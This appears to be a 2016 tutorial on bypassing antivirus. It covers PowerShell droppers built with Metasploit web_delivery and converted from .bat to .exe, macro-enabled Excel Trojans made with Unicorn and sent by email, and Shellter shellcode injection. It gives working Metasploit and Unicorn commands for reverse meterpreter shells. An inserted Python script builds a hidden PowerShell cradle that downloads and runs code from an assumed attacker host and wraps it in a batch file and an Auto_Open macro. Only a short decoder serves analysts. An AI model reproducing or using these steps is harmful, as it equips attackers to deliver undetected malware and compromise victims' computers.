Antivirus Bypass Techniques - 2016
A. PowerShell Exploitation
1. Technique : Generating Executable (.exe & .bat) Files
Description:
The attacker creates a Windows executable (.exe) program that acts as a Trojan. In this technique
the attacker generates a PowerShell command whose job is to create a WebClient object, download
the backdoor from the attacker's server and execute it in memory, and embeds that command inside
the executable program. Because the executable itself carries only the download command and not
the backdoor, there is little for a signature-based antivirus to match on.
How :
The attacker uses the Metasploit framework to generate the PowerShell command (target 2 of
web_delivery is the PSH/PowerShell target):
use exploit/multi/script/web_delivery
show targets
set target 2
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <IP>
set SRVHOST <Server IP>
set URIPATH /
exploit
After the link is created, the attacker's only remaining task is to get the command to run on the
victim's computer. To do that, the attacker creates a batch file, e.g. Notepad.bat, writes his own
code in it and embeds the malicious PowerShell command, then converts the .bat file to an .exe and
sends it to the victim.
Result :
Figure 1. Generating PowerShell Command
Figure 2. Embedding & Conversion of backdoor to .exe
Figure 3. Virus Total Result For Both Files
Figure 4. Victim Executing The Program
Figure 5. Attacker Getting Sessions
B. Macros
1. Technique : Generating Macro-Enabled (.xlsm) Files
Description:
The attacker creates an encoded payload using the tool Unicorn and uses that payload to generate a
macro-enabled Microsoft Excel file that acts as a Trojan.
How :
Download and install Unicorn, then generate the macro payload:
git clone https://github.com/trustedsec/unicorn.git
cd unicorn
python unicorn.py windows/meterpreter/reverse_tcp <Attacker IP> <Port For Listening> macro
The attacker uses the Metasploit framework to start the handler (the listening port is set with
LPORT, and it must match the port given to Unicorn):
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <IP>
set LPORT <PORT>
exploit
Now use the generated payload to create a macro-enabled Excel file.
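The two delivery methods above (the PowerShell command embedded in a batch file in section A, and the Unicorn-style macro in this section) carry the same stager: a PowerShell download cradle, Base64-encoded for -EncodedCommand, wrapped in a launcher. The following Python is an added example and is not code from the paper, from Metasploit or from Unicorn; it builds that stager, wraps it both ways, and recovers the plaintext command from a captured launcher, which is the triage step an analyst performs on such a file. The attacker host 192.0.2.10, port 8080, the cradle wording and the 200-character chunk size are assumptions standing in for the paper's <IP>/<Port> placeholders.

```python
"""Stager construction for the web_delivery (.bat) and Unicorn (macro) techniques.
Added example, not the paper's, Metasploit's or Unicorn's own code."""
import base64
import re


def download_cradle(host: str, port: int, uripath: str = "/") -> str:
    """PowerShell 'download cradle' of the kind web_delivery's PSH target serves:
    a WebClient fetches the second stage and IEX runs it in memory, so only this
    one-liner, never the backdoor itself, is written to the victim's disk."""
    url = f"http://{host}:{port}{uripath}"
    return f"$c = New-Object System.Net.WebClient; IEX $c.DownloadString('{url}')"


def encode_command(ps: str) -> str:
    """powershell.exe -EncodedCommand expects Base64 of the UTF-16LE bytes,
    not UTF-8; encoding the wrong way produces a command that silently fails."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


def decode_command(b64: str) -> str:
    """Inverse of encode_command: how an analyst reads a captured launcher."""
    return base64.b64decode(b64).decode("utf-16-le")


# Flags: -NoP no profile, -NonI non-interactive, -W Hidden no window,
# -Exec Bypass ignore execution policy, -Enc Base64 command (assumed flag set).
LAUNCH = "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc "


def bat_launcher(ps: str) -> str:
    """Batch file in the spirit of the paper's Notepad.bat: its only real
    content is the encoded PowerShell launch line."""
    return "@echo off\r\n" + LAUNCH + encode_command(ps) + "\r\n"


def vba_macro(ps: str, chunk: int = 200) -> str:
    """Auto_Open macro of the kind Unicorn's 'macro' mode writes (simplified).
    The Base64 blob is split across concatenated string literals because VBA
    rejects source lines longer than about 1023 characters."""
    b64 = encode_command(ps)
    parts = [b64[i:i + chunk] for i in range(0, len(b64), chunk)]
    lines = ["Sub Auto_Open()", "    Dim cmd As String", f'    cmd = "{LAUNCH}"']
    lines += [f'    cmd = cmd & "{p}"' for p in parts]
    lines += ["    Shell cmd, vbHide", "End Sub"]
    return "\n".join(lines)


def extract_encoded(launcher: str) -> str:
    """Pull the Base64 argument out of either wrapper and return the decoded
    PowerShell, i.e. answer 'what does this file actually run?'."""
    if "Sub Auto_Open" in launcher:
        b64 = "".join(re.findall(r'cmd = cmd & "([A-Za-z0-9+/=]+)"', launcher))
    else:
        b64 = re.search(r"-Enc\s+([A-Za-z0-9+/=]+)", launcher).group(1)
    return decode_command(b64)


if __name__ == "__main__":
    cradle = download_cradle("192.0.2.10", 8080)  # assumed attacker host/port
    print(bat_launcher(cradle))
    print(vba_macro(cradle))
    print("decoded:", extract_encoded(vba_macro(cradle)))
```

The decoder is the part worth keeping at hand: the VirusTotal results in the figures show that the wrappers themselves look benign, so recovering and reading the cradle (and the URL it fetches from) is how a defender tells a harmless .bat or macro from this one.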
Result :
Figure 6. Generate Payload with unicorn
Figure 7. Attacker Machine Start Handler
Figure 8. Create a macro-enabled Excel file with the evil code
Figure 9. Virus Total Result
Figure 10. Attaching Trojan With Email
Figure 11. Send Trojan With Email On Different Email Vendors
Figure 12. Victim AV Bypass
Figure 13. Victim Opens The File
Figure 14. Attacker Sessions
C. Shellter Project
1. Technique : Shellcode Injection Tool
Description:
Shellter is a dynamic shellcode injection tool, described by its author as the first truly dynamic
PE infector. It can be used to inject shellcode into native Windows applications (currently 32-bit
applications only), so the backdoor rides inside a legitimate, already-trusted program instead of a
freshly built executable.
The shellcode can be your own or something generated through a framework such as Metasploit.
Result :
Figure 15